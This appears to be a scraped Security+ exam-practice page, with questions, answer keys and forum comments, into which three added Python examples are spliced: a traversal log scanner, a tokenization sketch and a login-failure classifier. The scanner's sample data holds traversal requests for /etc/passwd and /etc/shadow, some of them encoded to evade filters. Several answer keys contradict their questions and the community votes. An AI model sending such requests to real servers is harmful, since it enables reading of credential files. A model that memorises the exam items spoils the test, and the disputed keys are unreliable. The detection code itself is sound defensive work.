Which of the following explains why RTO is included in a BIA?

A. It identifies the amount of allowable downtime for an application or system.

B. It prioritizes risks so the organization can allocate resources appropriately.

C. It monetizes the loss of an asset and determines a break-even point for risk mitigation.

D. It informs the backup approach so that the organization can recover data to a known time.

Correct Answer: A

Community vote distribution


A (91%) 9%

Jakalan7 Highly Voted 4 months, 2 weeks ago
Selected Answer: A
RTO = Recovery time objective. "The maximum tolerable length of time that a computer, system, network or application can be down after a
failure or disaster occurs." The answer is A.
upvoted 9 times

lordguck Most Recent 3 months ago
A is right. A BIA (business impact analysis) is part of a disaster recovery plan (DRP) and documents the costs (not only monetary) of
business/service interruptions/failures. A BIA is important for the disaster recovery strategy and documents RTO and RPO among other things.
upvoted 1 times

andrizo 3 months, 3 weeks ago
what's BIA?
upvoted 1 times

Sir_Learnalot 3 months ago
it stands for business impact analysis
upvoted 2 times

andrizo 3 months, 3 weeks ago
business incident analysis?
upvoted 1 times

deeden 4 months, 1 week ago
Selected Answer: B
I think option B makes more sense in terms of BIA. Option A to me sounds like MTD, option C sounds like SLE or ALE, and option D sounds like
an RPO.
upvoted 1 times

deeden 4 months, 1 week ago
Resource:
https://tandem.app/blog/what-is-the-difference-between-rpo-rto-mtd
upvoted 1 times

deeden 4 months, 1 week ago
or I could be wrong, and option B could be more appropriate to the Incident Response process, rather than a BIA.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: A
A is the right answer
upvoted 1 times

Question #180 Topic 1

A security analyst is reviewing web-application logs and finds the following log:

Which of the following attacks is being observed?

A. Directory traversal

B. XSS

C. CSRF

D. On-path attack

Correct Answer: C

Community vote distribution


A (93%) 7%

Vishnuks Highly Voted 5 months ago
Answer is A (Directory Traversal)
upvoted 12 times

stoneface 5 months ago
Agreed
upvoted 3 times

securityexam101 Highly Voted 4 months, 4 weeks ago
Selected Answer: A
../../ directory traversal
1=1 SQL
so A
upvoted 9 times

carpathia Most Recent 2 months, 3 weeks ago
Selected Answer: A
https://owasp.org/www-community/attacks/Path_Traversal
upvoted 1 times

zharis 3 months, 1 week ago
Selected Answer: B
Cross-site scripting inserts a malicious script that appears to be part of the trusted website
upvoted 1 times

zharis 3 months, 1 week ago
...but directory traversal, which involves a threat actor submitting a request for a file outside the web server's root directory by submitting a path
that navigates to the parent directory, looks more convincing given the URL included in the question.
upvoted 1 times

ylatif 3 months, 3 weeks ago
Cross-Site Request Forgery (CSRF) attacks execute unauthorized actions on web applications, via an authenticated end-user’s connection.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: A
It is A, directory traversal
upvoted 1 times

Dachosenone 4 months, 3 weeks ago
Selected Answer: A
It is directory traversal
upvoted 2 times

banditring 5 months ago
"A common symptom of this attack is the presence of a variation of the change to parent directory instruction (i.e., ../) in a URL, such as
..%c0%af or ..%5c." and it is showing this in this picture
upvoted 3 times
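An added example (not from the page, the exam or any project) of the detection logic behind the answer: it parses constructed Common Log Format lines, undoes the encodings mentioned above (`..%2f`, `..%5c`, overlong `..%c0%af`, double encoding) and reports which requests climb above the web root, carry `../` inside a parameter, or only reveal `..` once decoded. The log lines, IP addresses and function names are constructed for the illustration.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines in Common Log Format (not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jan/2023:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.7 - - [23/Jan/2023:10:00:02 +0000] "GET /images/../../../../etc/passwd HTTP/1.1" 200 1024
10.0.0.7 - - [23/Jan/2023:10:00:03 +0000] "GET /download?file=..%2f..%2fetc%2fshadow HTTP/1.1" 403 0
10.0.0.9 - - [23/Jan/2023:10:00:04 +0000] "GET /static/..%c0%af..%c0%afwindows/win.ini HTTP/1.1" 404 0
10.0.0.9 - - [23/Jan/2023:10:00:05 +0000] "GET /a/%252e%252e%252fb HTTP/1.1" 200 10
10.0.0.5 - - [23/Jan/2023:10:00:06 +0000] "GET /docs/v2/../v3/guide.html HTTP/1.1" 200 2048
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# "../" (or a trailing "..") at the start of a value or right after a separator
DOTDOT_RE = re.compile(r"(?:^|[/=&])\.\.(?:/|$)")
# Overlong UTF-8 forms of '/' and '\' that lenient decoders accept
OVERLONG = {b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/", b"\xc1\x9c": b"\\"}


def canonicalize(target, max_rounds=3):
    """Undo (double) percent-encoding and overlong UTF-8, then unify slashes."""
    raw = target.encode("utf-8", "surrogateescape")
    for _ in range(max_rounds):  # repeat so %252e -> %2e -> '.' is caught
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    for bad, good in OVERLONG.items():
        raw = raw.replace(bad, good)
    return raw.decode("utf-8", "replace").replace("\\", "/")


def traversal_indicators(target):
    """Return the reasons a request target looks like directory traversal (empty = clean)."""
    canon = canonicalize(target)
    path, _, query = canon.partition("?")
    reasons = []

    # 1. After normalization, does the path climb above the web root?
    #    (normpath keeps leading ".." on a relative path, so "images/../../x" -> "../x")
    rel = posixpath.normpath(path.lstrip("/")) if path.strip("/") else "."
    if rel == ".." or rel.startswith("../"):
        reasons.append(f"path escapes web root -> {rel}")

    # 2. Dot-dot-slash carried inside a query parameter (e.g. file=../../etc/shadow)
    for param in filter(None, query.split("&")):
        name, _, value = param.partition("=")
        if DOTDOT_RE.search(value):
            reasons.append(f"parameter {name!r} contains dot-dot-slash")

    # 3. Dot-dot-slash only appears once encoding is removed: an evasion attempt
    if DOTDOT_RE.search(canon) and not DOTDOT_RE.search(target.replace("\\", "/")):
        reasons.append("dot-dot-slash hidden by percent/overlong encoding")
    return reasons


def scan_log(text):
    """Parse CLF lines and return the flagged requests with their indicators."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        reasons = traversal_indicators(m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "target": m["target"],
                         "status": int(m["status"]), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["status"]} {hit["target"]}')
        for reason in hit["reasons"]:
            print("   -", reason)
```

The last sample line is a legitimate relative link that resolves inside the web root and is not flagged, which is why the check normalizes the path instead of alerting on every `..`; a 403 or 404 on a flagged request still deserves a look, since it shows the probing itself.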

derfnick 5 months ago
A Directory traversal
upvoted 4 times

Question #181 Topic 1

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the
server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely
cause?

A. Security patches were uninstalled due to user impact.

B. An adversary altered the vulnerability scan reports

C. A zero-day vulnerability was used to exploit the web server

D. The scan reported a false negative for the vulnerability

Correct Answer: A

Community vote distribution


A (83%) C (17%)

Danalyst Highly Voted 4 months, 3 weeks ago
Selected Answer: A
A zero-day would not appear in historical scans, surely? How could a scan detect and record it before it was known?
upvoted 8 times

Dachosenone Highly Voted 4 months, 3 weeks ago
Selected Answer: A
Dudes and dudettes, the question says "a patch is available for the vulnerability." So, answer A is the correct one.
upvoted 7 times

Gino_Slim 3 months, 1 week ago
Appreciate ya dude
upvoted 1 times

ronniehaang Most Recent 4 days, 3 hours ago
Selected Answer: A
The most likely cause is that the security patches were uninstalled due to user impact. A patch was available for the vulnerability that was used to
exploit the web server, but the patch was not applied, which allowed the attacker to exploit the server. This could have happened if the patch
was uninstalled due to compatibility issues or user complaints. It is important to keep systems updated and patched to prevent vulnerabilities
from being exploited.
upvoted 1 times

alwaysrollin247 1 month, 1 week ago
Selected Answer: A
I was originally thinking zero-day as well. However, this vulnerability was present in historical scan reports. It would not be zero-day; someone
uninstalled the patches and ignored the vulnerability in the previous scans.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: A
It is A, a zero-day won't pop up on a scan
upvoted 2 times

Ay_ma 4 months, 3 weeks ago
Why isn't it D, a false negative scan?
upvoted 2 times

Jakalan7 4 months, 2 weeks ago
Because it's not a false negative, a false negative would indicate that a particular vulnerability was undiscovered on the scan, which was not
the case.
upvoted 4 times

usam2021 4 months, 3 weeks ago
It is "present in historical" vulnerability scan reports, and a patch is available for the vulnerability, so this is not zero-day; "A" makes more sense.
upvoted 3 times

jgp 4 months, 4 weeks ago
If there is a patch, shouldn't it be impossible for it to be a zero-day attack? I think A makes more sense.
upvoted 5 times

enginne 5 months ago
Selected Answer: C
Previously a zero-day; today patches are available
upvoted 4 times

Ribeiro19 4 months, 4 weeks ago
Guys, it's AAAAAA, look: "The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is
available for the vulnerability"
upvoted 3 times

Ribeiro19 4 months, 4 weeks ago
A zero-day vulnerability is a vulnerability in a system or device that has been disclosed but is not yet patched. So if it is patched, it is not a
zero-day
upvoted 3 times

rhocale 1 month, 2 weeks ago
What is the difference between a zero-day vulnerability and a zero-day exploit?

The first term is zero-day vulnerability. This is when software has a flaw known to the developer, but the developer does not yet have a
patch ready to be released. If a patch is not released in time, nefarious actors can create a zero-day exploit -- our second term.

I.e., it's looking for a vulnerability, not an exploit.
upvoted 1 times

varun0 4 months, 4 weeks ago
Why are you assuming a patch didn't exist previously?
upvoted 1 times

Question #182 Topic 1

Which of the following is a known security risk associated with data archives that contain financial information?

A. Data can become a liability if archived longer than required by regulatory guidance.

B. Data must be archived off-site to avoid breaches and meet business requirements.

C. Companies are prohibited from providing archived data to e-discovery requests.

D. Unencrypted archives should be preserved as long as possible and encrypted.

Correct Answer: A

Community vote distribution


A (100%)

stoneface Highly Voted 5 months ago
Selected Answer: A
https://www.ontrack.com/en-gb/blog/archiving-risk-security-risks-associated-with-tape-storage
upvoted 6 times

ostralo 3 months, 3 weeks ago
if you've backed up customer databases onto tape, you could still have details for individuals who've long since stopped doing business with
you, despite the fact regulations may require you to delete this information. Keeping this data could create big problems for a company if a
breach occurs, so companies will need to find a way to ensure this information is permanently erased.
upvoted 2 times

Orean Most Recent 2 months, 4 weeks ago
Selected Answer: A
B, C, and D describe regulatory requirements and practices, not RISKS as the question asks.
upvoted 1 times

MarciaL 3 months, 2 weeks ago
B. Data must be archived off-site to avoid breaches and meet business requirements.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: A
Agree with A
upvoted 1 times

varun0 5 months ago
Selected Answer: A
Data minimization has to be done to decrease liability
upvoted 2 times

Question #183 Topic 1

Which of the following BEST describes the process of documenting who has access to evidence?

A. Order of volatility

B. Chain of custody

C. Non-repudiation

D. Admissibility

Correct Answer: B

Community vote distribution


B (100%)

rodwave 2 months, 3 weeks ago
Selected Answer: B
Answer: Chain of custody

A chain of custody is a chronological paper trail documenting when, how, and by whom individual items of physical or electronic evidence—such
as cell phone logs—were collected, handled, analyzed, or otherwise controlled during an investigation.
========================
Helpful info

Order of Volatility -the sequence or order in which the digital evidence is collected. The order is maintained from highly volatile to less volatile
data. Highly volatile data resides in the memory, cache, or CPU registers, and it will be lost as soon as the power to the computer is turned off.

Non-repudiation - the assurance that the sender of information is provided with proof of delivery and the recipient is provided with proof of the
sender's identity, so neither can later deny having processed the information.

Admissibility - the quality of being acceptable or valid, especially as evidence in a court of law.
upvoted 3 times

Knowledge33 3 months ago
Selected Answer: B
I think all responses are not correct, but the least false is response C (Chain of custody). The chain of custody is not limited to telling who has access
to why. It describes many things such as who had access, when, why, and so on. It's used for forensic investigation. The other responses are
totally false.
upvoted 1 times

RonWonkers 4 months, 2 weeks ago
Selected Answer: B
Chain of custody, B
upvoted 4 times

gen2dee 4 months, 2 weeks ago
Chain of custody
upvoted 3 times

Question #184 Topic 1

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the
bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose
two.)

A. Private cloud

B. SaaS

C. Hybrid cloud

D. IaaS

E. DRaaS

F. Fog computing

Correct Answer: CF

Community vote distribution


CF (80%) AF (20%)

ScottT Highly Voted 4 months, 3 weeks ago
CF - I had to look it up, so for those that didn't know: "Many people use the terms fog computing and edge computing interchangeably because
both involve bringing intelligence and processing closer to where the data is created" - https://www.techtarget.com/iotagenda/definition/fog-computing-fogging
upvoted 10 times

andrizo 3 months, 3 weeks ago
IOT location models
upvoted 2 times

ronniehaang Most Recent 4 days, 3 hours ago
Selected Answer: AF
F. Fog computing and A. Private cloud would BEST meet the requirements.

Fog computing refers to a decentralized computing infrastructure where data and applications are processed at the edge of the network, closer
to the devices that generate or collect the data. This reduces the latency between devices, as data does not have to travel back and forth from a
central location.

A private cloud architecture provides dedicated, isolated network infrastructure that is operated solely for an organization. This allows for the
creation of a low latency network environment, as all the devices are connected to a private network that is managed by the organization. This
type of architecture also provides more control over security, which is a key concern for organizations that process sensitive data.
upvoted 1 times

mick1 1 month, 1 week ago
How hybrid cloud can be low latency solution?
upvoted 2 times

FMMIR 1 month, 3 weeks ago
Selected Answer: CF
Fog computing and hybrid cloud would BEST meet the requirements. Fog computing is a distributed computing architecture that performs
analytics and other processing on the edge of a network, which reduces the amount of data that needs to be transmitted and the associated
bandwidth requirements. A hybrid cloud architecture combines the benefits of both public and private clouds, and allows for low-latency
communication between network-connected devices.
upvoted 4 times

Tomtom11 3 months, 1 week ago
Fog computing is a distributed form of cloud computing, in which the workload is performed on a distributed, decentralized architecture. Originally developed by Cisco, fog computing moves some of the work into the local space to manage latency issues, with the cloud being less synchronous. In this form, it is similar to edge computing, which is described in the next section.
upvoted 2 times

Smaa2 3 months, 1 week ago
can someone explain why hybrid cloud?
upvoted 1 times

G4ct756 3 months, 1 week ago
My interpretation: since the engineer "wanted to leverage a cloud-based architecture", the network is currently on-prem and they are planning to
offload some systems to the cloud. Also, with fog computing, the company needs to support an IoT network on-prem.
upvoted 2 times

Ranaer 2 weeks, 4 days ago
You can offload onto a private cloud as well. I don't see why it has to be hybrid.
upvoted 1 times

zaac22 2 months, 2 weeks ago
I agree
upvoted 1 times

ostralo 3 months, 3 weeks ago
DRaaS - Disaster Recovery as a Service
upvoted 2 times

Gino_Slim 3 months, 1 week ago
This aint the one buddy
upvoted 4 times

ostralo 3 months, 3 weeks ago
Fog computing is a decentralized computing infrastructure in which data, compute, storage and applications are located somewhere between
the data source and the cloud. Like edge computing, fog computing brings the advantages and power of the cloud closer to where data is
created and acted upon.
upvoted 2 times

Question #185 Topic 1

Which of the following is a policy that provides a greater depth and breadth of knowledge across an organization?

A. Asset management policy

B. Separation of duties policy

C. Acceptable use policy

D. Job rotation policy

Correct Answer: D

Community vote distribution


D (100%)

WondaByte Highly Voted 4 months, 3 weeks ago
Asset management policy looks more accurate to me.
upvoted 5 times

Gino_Slim 3 months, 1 week ago
Gaining knowledge....by managing assets? Nah my boy that aint it
upvoted 8 times

gen2dee 4 months, 2 weeks ago
The question was talking about gaining knowledge across the organization ("gaining knowledge in every department"); the only way that can be
done is through job rotation.
upvoted 14 times

  mlonz Most Recent  6 days, 6 hours ago


Asset management is the process of tracking valuable assets throughout their life cycles. For example, organizations commonly implement
processes to track hardware such as servers, desktop computers, laptop computers, routers, and switches. An effective asset management
system can help reduce several vulnerabilities.

=========================
Job rotation is a concept that has employees rotate through different jobs to learn the processes and procedures in each job. From a security
perspective, job rotation helps to prevent or expose dangerous shortcuts or even fraudulent activity. Employees might rotate through jobs
temporarily or permanently.
upvoted 2 times

  RonWonkers 4 months, 1 week ago


Selected Answer: D
Agree with D
upvoted 3 times

Question #186 Topic 1

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider
to see the stored credit card information. Which of the following would BEST meet these objectives?

A. WAF

B. CASB

C. VPN

D. TLS

Correct Answer: D

Community vote distribution


B (88%) 13%

  RonWonkers Highly Voted  4 months, 1 week ago


Selected Answer: B
It seems like every question that is regarding cloud security has CASB as the answer
upvoted 12 times

  varun0 Highly Voted  5 months ago


Selected Answer: B
TLS cannot protect stored data, CASB can
upvoted 9 times

  ronniehaang Most Recent  4 days, 3 hours ago


Selected Answer: D
A. A WAF is used to secure web applications by monitoring and blocking malicious traffic. However, it does not offer a secure solution for storing
sensitive data like credit card information.
B. A CASB is a security solution that sits between a cloud provider and an organization, providing security and visibility into cloud usage.
However, it does not specifically address the requirement of tokenizing credit card data and not allowing the cloud provider to see the
information.
C. A VPN provides a secure connection to the cloud provider, but it does not solve the issue of credit card data security.
D. TLS (Transport Layer Security) - TLS is a protocol used to encrypt network traffic and ensure that the data is secure during transmission. This
solution is useful for ensuring the security of data in transit, but it does not provide a secure solution for storing sensitive information like credit
card data.
upvoted 1 times

  ronniehaang 4 days, 3 hours ago


The BEST solution to meet the objectives would be to use a combination of encryption and tokenization. Encryption can be used to encrypt
the credit card data both in transit and at rest. Tokenization can be used to replace the actual credit card data with a unique token that
represents the data, so the cloud provider will not have access to the actual credit card information.
upvoted 1 times

  Ranaer 2 weeks, 4 days ago


Selected Answer: D
I think people here miss the mark by a long shot. For tokenization you need to have the database where tokens are referred to the actual CC
information. While the retail store can be hosted on the cloud, the CC-token database should not be on the cloud. I think the only reasonable
solution that would provide confidentiality from the client, through the cloud and then to the company itself, where the check can be made, is
through TLS.
TBH I'm not entirely sure, since this is a confusing question, but I do not believe CASB to be the correct answer.
upvoted 2 times

  CIL15 1 week, 3 days ago


In order to tokenize credit card data and not allow the cloud provider to see the stored credit card information, the company would need to
handle the tokenization process on their own servers, before the data is sent to the cloud provider. This can be done by using a tokenization
server or service that is located within the company's own network or infrastructure, and is not accessible to the cloud provider. The tokenized
credit card data can then be securely transmitted to the cloud provider's servers via a secure protocol like TLS. This way, the cloud provider
will only ever see the tokenized data and not the original credit card data.
upvoted 3 times

  Sandon 1 week, 3 days ago


It's not TLS because the data is at rest.
upvoted 1 times

  Ranaer 5 days ago


The CC data provided by the customer is absolutely NOT at rest. The data with CC info and its corresponding tokens is, but we are not
being asked about that. The way that makes the cloud provider unable to read the CC information is through encryption/tunnel, which TLS
provides.
upvoted 1 times
  ostralo 3 months, 3 weeks ago
CASBs have become a vital part of enterprise security, allowing businesses to safely use the cloud while protecting sensitive corporate data.
https://www.skyhighsecurity.com/en-us/cybersecurity-defined/what-is-a-casb.html
upvoted 3 times

  ramesh2022 4 months ago


A CASB's DLP capabilities help security teams protect sensitive information like financial data, proprietary data, credit card numbers, health
records, or social security numbers
upvoted 1 times

  stoneface 5 months ago


Not sure about this. TLS uses both asymmetric and symmetric encryption to protect the confidentiality and integrity of data in transit, which will
not prevent seeing the information at rest.

I think CASB will be more efficient as it also allows organizations to extend the reach of their security policies from their existing on-premises
infrastructure to the cloud and create new policies for cloud-specific context.

I hear you ...


upvoted 5 times
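The on-prem tokenization that CIL15 and ronniehaang describe above, as an added Python sketch that is not part of this thread: the token vault lives only on the company network, and the record the cloud-hosted site stores carries the token, never the card number. Class and function names are my own, and the card number is the well-known Visa test PAN 4111111111111111, not real data.

```python
import secrets
from dataclasses import dataclass, field


def luhn_valid(pan: str) -> bool:
    """Luhn checksum, so the vault refuses malformed card numbers outright."""
    if not pan.isdigit() or len(pan) < 12:
        return False
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


@dataclass
class OnPremTokenVault:
    """Token -> PAN mapping that lives only on the company's own network.

    Nothing in this object is ever shipped to the cloud provider; the retail
    site running in the cloud stores and handles the token alone.
    (Hypothetical class for illustration, not a product API.)
    """
    _store: dict = field(default_factory=dict)

    def tokenize(self, pan: str) -> str:
        if not luhn_valid(pan):
            raise ValueError("not a valid card number")
        while True:
            # Random digits, not derived from the PAN, so the token reveals
            # nothing even if the cloud copy leaks. The last four digits are
            # kept for customer-facing display ("card ending in 1111").
            body = "".join(str(secrets.randbelow(10)) for _ in range(len(pan) - 4))
            token = "tok_" + body + pan[-4:]
            if token not in self._store:      # collision guard
                break
        self._store[token] = pan
        return token

    def detokenize(self, token: str) -> str:
        """Only the on-prem payment service calls this, never the cloud site."""
        return self._store[token]


def cloud_order_record(vault: OnPremTokenVault, customer_pan: str, amount_cents: int) -> dict:
    """What the cloud-hosted retail site is allowed to persist: the token, not the PAN."""
    return {"card_token": vault.tokenize(customer_pan), "amount_cents": amount_cents}


def record_leaks_pan(record: dict, pan: str) -> bool:
    """Defender's check: does anything in the cloud-side record contain the real PAN?"""
    return any(pan in str(value) for value in record.values())


if __name__ == "__main__":
    vault = OnPremTokenVault()
    rec = cloud_order_record(vault, "4111111111111111", 1999)   # well-known test PAN
    print("cloud sees:", rec)
    print("leaks PAN?", record_leaks_pan(rec, "4111111111111111"))
    print("on-prem resolves to:", vault.detokenize(rec["card_token"]))
```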

Question #187 Topic 1

A security analyst is tasked with defining the "something you are" factor of the company's MFA settings. Which of the following is BEST to use to
complete the configuration?

A. Gait analysis

B. Vein

C. Soft token

D. HMAC-based, one-time password

Correct Answer: B

Community vote distribution


B (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: B
Gait and vein are both 'something you are' factors.

But gait is also considered 'something you do'.

I'm going with vein here


upvoted 15 times

  k9_462 Highly Voted  5 months ago


Selected Answer: B
While gait and vein are both "something you are", a gait is easily altered and/or mimicked.
Vein mapping in something like an iris scan is much harder to trick
upvoted 5 times

  creepyvirus Most Recent  1 month, 2 weeks ago


To define the "something you are" factor of the company's MFA settings, the security analyst can use "gait analysis".

Gait analysis involves using biometric sensors to analyze an individual's walking style and identify them based on their unique gait patterns. This
can be used as a factor in MFA to authenticate a user's identity.
upvoted 1 times

  Knowledge33 3 months ago


Selected Answer: B
Vein is the only possible response. According to the CompTIA Security+ All-in-One book, gait analysis is never used for authentication. It's only used
to identify a suspect in a group of others, enabling tracking of individuals in a crowd.
upvoted 1 times

Question #188 Topic 1

Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

A. Pulverizing

B. Overwriting

C. Shredding

D. Degaussing

Correct Answer: B

Community vote distribution


B (92%) 8%

  mlonz 6 days, 6 hours ago


Degaussing. A degausser is a very powerful electronic magnet. Passing a disk through a degaussing field renders the data on tape and magnetic
disk drives unreadable.
upvoted 1 times

  asum 2 weeks, 4 days ago


Selected Answer: B
You cannot reuse a hard drive once it has been degaussed. This is because the degaussing process not only removes all the data, but it also
removes the start-up files. As such, a degaussed hard drive will not boot up.
upvoted 2 times

  Ranaer 1 month, 2 weeks ago


Selected Answer: B
The answer is B. Overwriting.
The reason degaussing won't work is because when this process is used, it erases EVERYTHING on the disk, including the disk startup files, the
servo positioning and possibly others that I'm not aware of. The servo positioning information is put in by the manufacturer itself, in the factory.
There is no way to restore that data, which renders the disk COMPLETELY unusable.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: B
DEGAUSSING: doesn’t allow reuse and same as option A & C. So the correct answer is B
upvoted 1 times

  Nome02 1 month, 3 weeks ago


Correct is D. Please read the question carefully. It is asking for a method to eliminate the data for repurposing.
upvoted 1 times

  keak 2 months ago


Selected Answer: B
Overwriting or Clearing: Preparing media for reuse and ensuring data cannot be recovered using traditional recovery tools.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: B
B is the only one giving the option to reuse the device afterwards. Degaussing would not give you the option for reuse
upvoted 1 times

  lordguck 3 months ago


B: To make it short, good luck degaussing a SSD.
upvoted 1 times

  Funt 3 months, 2 weeks ago


If it was actually degaussed by running it through an electromagnet then it's toast. The servo platter will have been erased, leaving no head
positioning information. The servo tracks can only be written at the factory.
upvoted 2 times

  comeragh 4 months ago


Selected Answer: B
Agree with B here
upvoted 1 times

  varun0 4 months, 4 weeks ago


Selected Answer: B
Overwriting, disregard my other comment. Overwriting allows disk to be reused
upvoted 4 times

  varun0 5 months ago


Selected Answer: D
I think it's D because they said eliminating data, not overwriting.
upvoted 1 times

  varun0 5 months ago


Simply put, degaussers rearrange the magnetic field on a hard drive to destroy or randomize the data. This process either destroys the data
completely or makes it unrecognizable.
upvoted 3 times

  anonimouse2 4 months, 4 weeks ago


You cannot reuse a drive that has been degaussed. It's B.
upvoted 4 times

  varun0 4 months, 4 weeks ago


Disregard this, it's overwriting. Degaussers don't allow the disk to be reused
upvoted 2 times

Question #189 Topic 1

A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM:

Which of the following describes what is occurring?

A. An attacker is utilizing a password-spraying attack against the account.

B. An attacker is utilizing a dictionary attack against the account.

C. An attacker is utilizing a brute-force attack against the account.

D. An attacker is utilizing a rainbow table attack against the account.

Correct Answer: C

Community vote distribution


C (100%)

  FMMIR 2 months, 1 week ago


Selected Answer: C
A simple brute-force attack uses automation and scripts to guess passwords. Typical brute-force attacks make a few hundred guesses every
second. Simple passwords, such as those lacking a mix of upper- and lowercase letters and those using common expressions like ‘123456’ or
‘password,’ can be cracked in minutes. Look at the time of attacks performed.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Why comptia, why
upvoted 1 times

  abrilo 3 months, 4 weeks ago


If it was brute force, shouldn't different passwords be shown in the SIEM?
upvoted 2 times

  alayeluwa 3 months, 3 weeks ago


Look closely lol, the numbers in the password are changing.
upvoted 4 times

  db97 4 months, 1 week ago


Dictionary attack -> known and common words being used
Spraying password -> will try top 3/5 passwords on multiple user accounts
Brute Force -> will try any password combination, resulting with a lock out most of the time
upvoted 4 times

  RonWonkers 4 months, 1 week ago


Selected Answer: C
Agree with Brute Force
upvoted 1 times

  passmemo 4 months, 2 weeks ago


Selected Answer: C
Password spraying is an attack that attempts to access a large number of accounts (usernames) with a few commonly used passwords.
Traditional brute-force attacks attempt to gain unauthorized access to a single account by guessing the password.
upvoted 4 times

  comeragh 4 months, 3 weeks ago


Selected Answer: C
Brute Force - locked out account/1 account several password attempts to me points to Brute Force
upvoted 4 times
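The distinction db97 and passmemo draw above (one account, many failures versus many accounts, few failures each) is exactly what a detection rule on the SIEM's failed-login events can test. This is an added Python example, not from the thread or from any SIEM product: the log lines are constructed, the field format and the thresholds are my own assumptions, and the source addresses come from the RFC 5737 documentation ranges.

```python
import re
from collections import defaultdict

# Constructed SIEM-style authentication events (not real data).
SAMPLE_LOG = (
    [f"2023-01-20T08:14:{i:02d}Z auth=FAIL user=jsmith src=203.0.113.7" for i in range(12)]
    + [f"2023-01-20T09:00:{i:02d}Z auth=FAIL user=user{i} src=198.51.100.9" for i in range(6)]
    + [
        "2023-01-20T10:02:00Z auth=FAIL user=bob src=192.0.2.5",   # a typo, then success
        "2023-01-20T10:02:10Z auth=OK user=bob src=192.0.2.5",
        "garbage line the parser must skip",
    ]
)

# Assumed line format: "<timestamp> auth=<FAIL|OK> user=<name> src=<ip>".
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth=(?P<result>FAIL|OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_events(lines):
    """Turn raw log lines into dicts; lines that do not match the format are dropped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def classify_sources(events, brute_threshold=10, spray_accounts=5, spray_max_per_account=3):
    """Label each source address by the shape of its failures.

    brute-force       : many failures against ONE account (lockouts follow)
    password-spraying : a few failures each across MANY accounts
    normal            : anything below both thresholds
    The thresholds are assumptions; tune them to the site's lockout policy.
    """
    fails = defaultdict(lambda: defaultdict(int))   # src -> user -> failure count
    for e in events:
        if e["result"] == "FAIL":
            fails[e["src"]][e["user"]] += 1

    verdicts = {}
    for src, per_user in fails.items():
        worst_account = max(per_user.values())
        if worst_account >= brute_threshold:
            verdicts[src] = "brute-force"
        elif len(per_user) >= spray_accounts and worst_account <= spray_max_per_account:
            verdicts[src] = "password-spraying"
        else:
            verdicts[src] = "normal"
    return verdicts


def accounts_at_lockout_risk(events, lockout_threshold=5):
    """Accounts whose failure count already meets the lockout threshold (the symptom in the question)."""
    per_user = defaultdict(int)
    for e in events:
        if e["result"] == "FAIL":
            per_user[e["user"]] += 1
    return sorted(u for u, n in per_user.items() if n >= lockout_threshold)


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    print(classify_sources(evts))
    print("lockout risk:", accounts_at_lockout_risk(evts))
```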

Question #190 Topic 1

A web server has been compromised due to a ransomware attack. Further investigation reveals the ransomware has been in the server for the
past 72 hours. The systems administrator needs to get the services back up as soon as possible. Which of the following should the administrator
use to restore services to a secure state?

A. The last incremental backup that was conducted 72 hours ago

B. The last known-good configuration

C. The last full backup that was conducted seven days ago

D. The baseline OS configuration

Correct Answer: A

Community vote distribution


C (54%) A (28%) B (19%)

  FQ Highly Voted  4 months, 3 weeks ago


Selected Answer: A
B and D affects the configuration, not the users data.
C is a full back up which takes time, the question asks for the best option to get the service up as soon as possible.
Answer is A.
upvoted 13 times

  zzzfox 4 months, 3 weeks ago


If it's ransomware, all data should have been encrypted. An incremental backup won't help you get all your data back. I would go with answer C.
upvoted 12 times

  alwaysrollin247 1 month, 1 week ago


So restore back to a point where the ransomware was likely still on the system? I think not. The question also states "restore data to a secure
state" not as soon as possible. The answer is C.
upvoted 3 times

  ostralo 3 months, 3 weeks ago


I second zzzfox's opinion. Any incremental backups without a full backup are meaningless.

An incremental backup is a backup type that only copies data that has been changed or created since the previous backup activity was
conducted.

Since all the data has gone, we need a full backup + any available incremental backups or differential backups. Either way, a full backup is a
must.
upvoted 2 times

  comeragh Highly Voted  4 months, 3 weeks ago


Selected Answer: C
I would go with C here. Reason - 7 days ago is more than 72 hours ago and possibly the last good backup taken. Just my thoughts. Open for
discussion...
upvoted 10 times

  ronniehaang Most Recent  4 days, 2 hours ago


Selected Answer: C
